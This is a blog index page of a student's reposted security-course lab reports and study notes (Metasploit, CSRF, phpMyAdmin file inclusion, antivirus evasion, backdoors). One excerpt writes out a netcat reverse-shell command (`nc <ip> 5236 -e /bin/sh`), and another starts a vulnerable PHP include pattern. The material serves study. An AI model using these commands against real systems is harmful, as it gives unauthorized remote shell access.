- 博客(57)
- 收藏
- 关注
RSS订阅转载 虚拟机检测技术简单实践
虚拟机检测技术简单实践概述恶意软件恶意软件是指在计算机系统上执行恶意任务的病毒、蠕虫和特洛伊木马的程序,通过破坏软件进程来实施控制。恶意软件其本身可能是一种病毒,蠕虫,后门或漏洞攻击脚本,它通过动态地改变攻击代码可以逃避入侵检测系统的特征检测(Signature-based detection ,也可称为模式匹配)。攻击者常常利用这种多变代码进入互联网上的一些带有入侵侦测的系统或...
2018-07-06 12:24:00
879
转载 XAMPP、PHPstorm和PHPcharm和Windows环境下Python搭建+暴力破解
XAMPP的安装和使用一、什么是XAMPP?XAMPP是最流行的PHP开发环境。 XAMPP是完全免费且易于安装的Apache发行版,其中包含Apache、MariaDB、PHP和Perl。类似XAMPP的服务器套件还有很多,我用过的还有UPUPW,它们都极大的简化了开发环境的配置。十六款免费的服务器套件的介绍介绍了主流的免费服务器开发套件。二、安装xampp下载地址:htt...
2018-07-06 12:16:00
375
转载 20155236范晨歌免考项目
PHP和PHPinfo的简单介绍https://www.cnblogs.com/fcgfcgfcg/p/9234978.html通过CSRF漏洞加深理解https://www.cnblogs.com/fcgfcgfcg/p/9244626.htmlphpMyAdmin 4.7.x CSRF 漏洞利用及phpMyAdmin介绍https://www.cnblogs.com/...
2018-07-06 12:12:00
633
转载 Metasploit简单应用
什么是MetasploitMetasploit是一款开源的安全漏洞检测工具。它可以帮助用户识别安全问题,验证漏洞的缓解措施,并对某些软件进行安全性评估,提供真正的安全风险情报。当我们第一次接触Metasploit渗透测试框架软件(MSF)时,可能会被它提供如此多的接口、选项、变量和模块所震撼,而感觉无所适从。Metasploit软件为它的基础功能提供了多个用户接口,包括终端、命令行和...
2018-07-04 21:13:00
247
转载 CSRF攻击原理及防御
CSRF攻击原理及防御CSRF 跨站点请求伪造(Cross—Site Request Forgery)。我的理解就是:攻击者盗用了你的身份,以你的名义发送恶意请求,对服务器来说这个请求是完全合法的,但是却完成了攻击者所期望的一个操作,比如以你的名义发送邮件、发消息,盗取你的账号,添加系统管理员,甚至于购买商品、虚拟货币转账等。原理图:图CSRF原理图这是一种对网站的恶意利用...
2018-06-29 17:37:00
108
转载 phpMyAdmin 4.8.x 本地文件包含漏洞利用
phpMyAdmin 4.8.x 本地文件包含漏洞利用ChaMd5安全团队公开了一个phpMyAdmin最新版中的本地文件包含漏洞:phpmyadmin4.8.1后台getshell。该漏洞利用不要求root帐号,只需能够登录 phpMyAdmin 便能够利用。这一部分我们需要先了解一下LFI漏洞(本地文件包含漏洞)典型漏洞代码: <!–?php include($_GET...
2018-06-27 17:22:00
114
转载 PHP和PHPINFO
PHP开放源码和跨越平台,PHP可以运行在WINDOWS和多种版本的LINUX上。它不需要任何预先处理而快速反馈结果,它也不需要mod_perl的调整来使您的服务器的内存映象减小。PHP消耗的资源较少,当PHP作为ApacheWeb服务器一部分时,运行代码不需要调用外部二进制程序,服务器不需要承担任何额外的负担。关于PHP $_SERVER的一些使用方式$_SERVER['HTTP...
2018-06-27 17:14:00
250
转载 phpMyAdmin 4.7.x CSRF 漏洞利用
phpMyAdmin 4.7.x CSRF 漏洞利用phpMyAdminphpMyAdmin是一个以PHP(一种开源脚本语言)为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库。借由此Web接口可以成为一个简易方式输入繁杂SQL语法的较佳途径,尤其要处理大量资料的汇入及汇出更为方便。其中一个更大的优势在于由于phpM...
2018-06-24 17:53:00
246
转载 20155236范晨歌_Web安全基础实践
20155236范晨歌_Web安全基础实践目录实践目标WebGoatBurpSuiteInjection FlawsCross-Site Scripting (XSS)总结实践目标(1)理解常用网络攻击技术的基本原理。(2)Webgoat实践下相关实验。WebGoatWebGoat是由著名的OWASP负责维护的一个漏洞百出的J2EE Web应用程序,这些...
2018-06-03 11:29:00
151
转载 20155236范晨歌_Web基础
20155236范晨歌_Web基础目录实践目标Apache前端编程后端编程 PHPMYSQL & 后端简单SQL注入与XSS发帖和会话管理实践目标(1)Web前端HTML(2)Web前端javascipt(3)Web后端:MySQL基础:正常安装、启动MySQL,建库、创建用户、修改密码、建表(4)Web后端:编写PHP网页,连接数据库,进行用户认...
2018-05-21 22:40:00
217
转载 20155236范晨歌 Exp7 网络欺诈技术防范
20155236范晨歌 Exp7 网络欺诈技术防范虚拟机经常崩= =,所以基本上做一个实验换一个。。。遇到了一个简单的小问题老师帮忙解决了:虚拟机没联网。。。一、基础问题回答通常在什么场景下容易受到DNS spoof攻击?乱连没有密码的wifi,因为这样就会和连入局域网和该局域网中的各个主机都处于同一网段下了。在日常生活工作中如何防范以上两攻击方法?URL攻...
2018-05-08 23:04:00
164
转载 20155236范晨歌_exp6信息搜集与漏洞扫描
20155236范晨歌_exp6信息搜集与漏洞扫描目录实践目标信息搜集漏洞扫描总结实践目标(1)各种搜索技巧的应用(2)DNS IP注册信息的查询(3)基本的扫描技术:主机发现、端口扫描、OS及服务版本探测、具体服务的查点(4)漏洞扫描:会扫,会看报告,会查漏洞说明,会修补漏洞信息搜集实验内容查询一个网站的注册信息,可以看到其拥有的ip段、注册地址、注...
2018-05-04 19:37:00
181
转载 20155236范晨歌_MSF基础应用
20155236范晨歌_MSF基础应用20155236范晨歌_MSF基础应用目录概述MS08-067漏洞攻击MS11-050漏洞攻击MS10-087漏洞攻击辅助模块概述MSF的六种模块Exploit模块是利用发现的安全漏洞或配置弱点对远程目标系统进行攻击,以植入和运行攻击载荷,从而获得对远程目标系统访问权的代码组件。形象点来说就是攻击模块Payload...
2018-04-25 13:45:00
145
转载 20155236范晨歌 恶意代码分析
20155236范晨歌 恶意代码分析恶意代码恶意代码是指故意编制或设置的、对网络或系统会产生威胁或潜在威胁的计算机代码。最常见的恶意代码有计算机病毒(简称病毒)、特洛伊木马(简称木马)、计算机蠕虫(简称蠕虫)、后门、逻辑炸弹等。特征:恶意的目的,获取靶机权限、用户隐私等本身是计算机程序,可以执行,并作用于靶机通过执行发生作用,一般来说不运行是没问题的恶意代码分析...
2018-04-18 14:18:00
200
转载 20155236范晨歌_EXP3免杀原理与实践
20155236范晨歌_免杀原理与实践免杀概述免杀,也就是反病毒(AntiVirus)与反间谍(AntiSpyware)的对立面,英文为Anti-AntiVirus(简写Virus AV),逐字翻译为“反-反病毒”,翻译为“反杀毒技术”。被谁杀?当然是被杀毒软件(引擎)杀。所以,要做好免杀技术(防御),就要弄清杀毒方式(攻击),也就是这些杀毒软件是如何工作的。恶意代码检测方...
2018-04-11 11:21:00
195
转载 20155236范晨歌 Exp2后门原理与实践
## 实验二 后门原理与实践1.Windows获得Linux Shell在windows下,打开CMD,使用ipconfig指令查看本机IPncat.exe -l -p 5236监听本机的5236端口在kali端,使用nc指令的-e选项,nc XXX.XXX.XXX.XXX(主机ip) 5236(所设置的端口) -e /bin/sh反向连接Windows主机的5236端口:...
2018-04-01 18:50:00
149
转载 20155236范晨歌 Exp1PC平台逆向破解及Bof基础实践
出现的问题及解决:在下载execstack时,出现了下列签名无效的错误!解决方案:发现是密钥过期了,将新的密钥填入apt-keyring输入命令:apt-key adv --keyserver hkp://keys.gnupg.net --recv-keys 7D8D0BF6再执行update发现问题解决。实验一 逆向及Bof基础1.掌握NOP, JNE, JE, JMP...
2018-03-18 15:11:00
149
转载 20155236 《信息安全系统设计基础》课程总结
20155236 《信息安全系统设计基础》课程总结每周作业链接汇总20155236 《信息安全系统设计基础》第1周学习总结简要内容:GCC编译器,库的链接二维码:20155236 《信息安全系统设计基础》第2周实践博客简要内容:vim学习,gcc、gdb的使用二维码:20155236 《信息安全系统设计基础》第3周学习总结简要内容:信息的表示和处理,对信...
2017-12-29 11:47:00
98
转载 20155236 《信息安全系统设计基础》第十四周学习总结
20155236 《信息安全系统设计基础》第14周学习总结程序的机器级表示历史观点Intel处理器系列:俗称x86,开始时是第一代单芯片、16位微处理器之一。DOS时代的平坦模式,不区分用户空间和内核空间,很不安全;8086的分段模式;IA32的带保护模式的平坦模式每个后继处理器的设计都是后向兼容的,可以保证较早版本上编译的代码在较新的处理器上运行。程序编码GC...
2017-12-24 14:59:00
205
转载 20155236 《信息安全系统设计基础》实验五 通信协议设计
2017-2018-1 《信息安全系统设计基础》实验五 通信协议设计实验任务:1.安装OpenSSL环境,并编写测试代码验证无误2.研究OpenSSL算法,测试对称算法中的AES,非对称算法中的RSA,Hash算法中的MD53.在Ubuntu中实现对实验二中的“wc服务器”通过混合密码系统进行防护知识梗概:SSLSSL简介:SSL是Secure Sockets La...
2017-12-17 15:33:00
123
转载 20155236 《信息安全系统设计基础》第13周学习总结
20155236 《信息安全系统设计基础》第13周学习总结网络编程套接字接口概述:并发编程并发:逻辑控制流在时间上重叠并发程序:使用应用级并发的应用程序称为并发程序。三种基本的构造并发程序的方法:进程,用内核来调用和维护,有独立的虚拟地址空间,显式的进程间通信机制。I/O多路复用,应用程序在一个进程的上下文中显式的调度控制流。逻辑流被模型化为状态机。线程,运...
2017-12-17 13:35:00
99
转载 2017-2018-1 20155217 20155236 实验四 外设驱动程序设计
http://www.cnblogs.com/yangdi0420/p/7941040.html转载于:https://www.cnblogs.com/fcgfcgfcg/p/7966734.html
2017-12-03 18:19:00
82
转载 20155236 《信息安全系统设计基础》第11周学习总结
20155236 《信息安全系统设计基础》第11周学习总结教材学习内容总结ls -l:可以显示当前目录下目录或文件的详细属性信息1详细属性说明:第一位表示类型,-代表文件,d代表目录;二至四位代表文件创建者权限,-代表无权限,r代表具有读权限,w代表具有写权限,x代表具有执行权限;五至七位代表同组用户权限;八至十位代表其他用户权限。第二列为文件硬链接数,或目录、子...
2017-12-03 18:07:00
84
转载 信息安全技术 实验3 木马及远程控制技术
信息安全技术 实验3 木马及远程控制技术实验报告课程: 信息安全技术 班级:1552姓名:范晨歌、田皓宇学号:20155226、20155236指导教师: 李冬冬实验日期及时间:2017.11.22 15:30-18:00座位号:36必修/选修:必修实验序号:3实验名称:木马及远程控制技术实验目的剖析网页木马的工作原理理解木马的植入过程学会编写简单的网页...
2017-11-29 09:36:00
1151
转载 2017-2018-1 20155236 实验三 实时系统
2017-2018-1 20155236 实验三 实时系统实验三-并发程序-1学习使用Linux命令wc(1)基于Linux Socket程序设计实现wc(1)服务器(端口号是你学号的后6位)和客户端客户端传一个文本文件给服务器服务器返加文本文件中的单词数上方提交代码附件提交测试截图,至少要测试附件中的两个文件server:#include <stdio.h>...
2017-11-19 19:09:00
70
转载 linux编程实践:实现pwd命令
内核为每个目录都设置了一个指向自己的i节点入口,即".",还有一个指向其父目录i节点的入口,即”..",我们首先获取当前目录的i节点编号,但是并不能知道当前目录的名称,我们切换到其的父目录,在里面寻找当前i节点编号对应的文件名即可。这样我们就很容易联想到使用递归来实现,但是终止条件是什么呢?在Unix文件系统的根目录中,“."和“..”指向同一个i节点,我们可以以此判断是否发到达了根目...
2017-11-19 18:40:00
147
转载 2017-2018-1 201552236 《信息安全系统设计基础》第9周学习总结
2017-2018-1 201552236 《信息安全系统设计基础》第9周学习总结存储器层次结构存储技术随机访问存储器随机访问存储器分为:静态的SRAM、动态的DRAM静态RAM:SRAM的特点:存储器单元具有双稳态特性,只要有电就会永远保持它的值,干扰消除时,电路就会恢复到稳定值。动态RAM:DRAM的特点:每一位的存储是对一个电容的充电;对干扰非常敏感。用途...
2017-11-17 22:17:00
71
转载 20155236 《信息安全系统设计基础》第8周学习总结
20155236 《信息安全系统设计基础》第8周学习总结网络编程套接字接口概述:并发编程并发:逻辑控制流在时间上重叠并发程序:使用应用级并发的应用程序称为并发程序。三种基本的构造并发程序的方法:进程,用内核来调用和维护,有独立的虚拟地址空间,显式的进程间通信机制。I/O多路复用,应用程序在一个进程的上下文中显式的调度控制流。逻辑流被模型化为状态机。线程,运行在...
2017-11-11 20:07:00
80
转载 2017-2018-1 20155217 20155236实验二 固件程序设计
http://www.cnblogs.com/yangdi0420/p/7787134.html转载于:https://www.cnblogs.com/fcgfcgfcg/p/7788102.html
2017-11-05 18:11:00
72
转载 20155236 2017-2018-1 《信息安全系统设计基础》第7周学习总结
20155236 2017-2018-1 《信息安全系统设计基础》第7周学习总结教材学习内容总结处理器体系结构Y86指令集体系结构内容:定义一个指令集体系结构,包括定义各种状态元素、指令集和它们的编码、一组编程规范和异常事件处理程序员可见状态:Y86程序中的每条指令都会读取或修改处理器状态的某些部分。Y86具体包括:8个程序寄存器、3个条件码ZF\SF\OF、程序计数器(P...
2017-11-05 18:10:00
82
转载 20155236 《信息安全概论》实验二(Windows系统口令破解)实验报告
20155236 《信息安全概论》实验二(Windows系统口令破解)实验报告北京电子科技学院(BESTI)实验报告课程:信息安全概论 班级:1552 姓名:范晨歌 学号:20155236成绩: 指导教师: 李冬冬实验日期及时间: 2017年10月11日 15:30—18:00座位号:36 必修/选修:必修 实验序号:02实验名称: Windows系统口令破解一、实验目的...
2017-11-01 08:33:00
1562
转载 20155217 20155236 20155324 《信息安全系统设计基础》实验一 开发环境的熟悉
http://www.cnblogs.com/wang5324/p/7710820.html转载于:https://www.cnblogs.com/fcgfcgfcg/p/7712678.html
2017-10-22 23:37:00
59
转载 20155236 2017-2018-1 《信息安全系统设计基础》第5周学习总结
20155236 2017-2018-1 《信息安全系统设计基础》第5周学习总结教材学习内容总结程序的机器级表示程序编码GCC将源代码转化为可执行代码的步骤:C预处理器——扩展源代码-生成.i文件编译器——产生两个源代码的汇编代码-——生成.s文件汇编器——将汇编代码转化成二进制目标代码——生成.o文件链接器——产生可执行代码文件机器级代码:机器级程序使用的存储器地...
2017-10-22 13:15:00
110
转载 20155236 2017-2018-1 《信息安全系统设计基础》第4周学习总结
20155236 2017-2018-1 《信息安全系统设计基础》第4周学习总结C语言实现Linux命令——od 补做实现要求:1.复习c文件处理内容2.编写myod.c 用myod XXX实现Linux下od -tx -tc XXX的功能3.main与其他分开,制作静态库和动态库4.编写Makefile5.提交测试代码和运行结果截图 6.提交调试过程截图,要全屏,包含自己...
2017-10-15 21:13:00
111
转载 20155236 2017-2018-1 《信息安全系统设计基础》第3周课程总结
20155236 2017-2018-1 《信息安全系统设计基础》第3周课程总结教材学习内容总结三种数字表示无符号数:基于传统的二进制表示法,表示大于或等于零的数字补码:表示有符号数,可为正可为负的数字浮点数:表示实数的科学计数法的以二为基数的版本整数运算和浮点数运算因为它们处理数字表示方式不同,整数的表示只能编码一个相对较小的数值范围,但这种表示精确;浮点数编码数值范围相...
2017-10-15 16:43:00
78
转载 20155236 2017-2018-1 《信息安全系统设计基础》第2周课堂实践
20155236 2017-2018-1 《信息安全系统设计基础》第2周课堂实践第二周测试1-vi测试每个.c一个文件,每个.h一个文件,文件名中最好有自己的学号1.用Vi输入图中代码,并用gcc编译通过2.在Vi中使用K查找printf的帮助文档提交vi编辑过程截图,要全屏,包含自己的学号信息课上已经提交。第二周测试2-gcc测试用gcc 进行预处理,编译,汇...
2017-09-30 14:36:00
166
转载 20155236 2017-2018-1 《信息安全系统设计基础》第1周学习总结
20155236 2017-2018-1 《信息安全系统设计基础》第1周学习总结教材学习内容总结第一章:计算机系统漫游GCC编译器四个阶段:cpp(预处理器),ccl(编译器),as(汇编器),ld(链接器)ESC - (c)iso .c/i/s以文本方式保存,.o以二进制形式保存。第七章:链接静态库是编译系统提供的机制将相关目标模块打包成的文件。可用于链接器的输入。...
2017-09-24 19:30:00
77
转载 20155236 2016-2017-2《Java程序设计》课程总结
20155236 2016-2017-2《Java程序设计》课程总结作业链接汇总预备作业1:对专业学习的展望,课程方面、师生关系的建议预备作业2:在实践中学习,自己的相关经验以及C语言相关知识点预备作业3:虚拟机安装及运行第一周作业:java平台概论第二周作业:java基本类型、变量、运算符、流程控制,逻辑结构第三周作业:类(.class)与重载(overload),方法声...
2017-06-02 18:52:00
88
转载 20155236 《Java程序设计》实验五(网络编程与安全)实验报告
20155236 《Java程序设计》实验五(网络编程与安全)实验报告一、实验内容及步骤任务一:编写MyBC.java实现中缀表达式转后缀表达式的功能编写MyDC.java实现从上面功能中获取的表达式中实现后缀表达式求值的功能任务二:结对编程:一人负责客户端,另一人负责服务器注意责任归宿,要会通过测试证明自己没有问题基于Java Socket实现客户端/服务器功能,传...
2017-06-02 14:53:00
92
转载 20155236 《Java程序设计》实验四(Android程序设计)实验报告
20155236 《Java程序设计》实验四(Android程序设计)实验报告一、实验内容及步骤第24章:初识Android任务一:完成Hello World, 要求修改res目录中的内容,Hello World后要显示自己的学号学习Android Stuidio调试应用程序第25章:活动任务二:创建 ThirdActivity, 在ThirdActivity中显示自己的...
2017-05-20 16:01:00
133
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人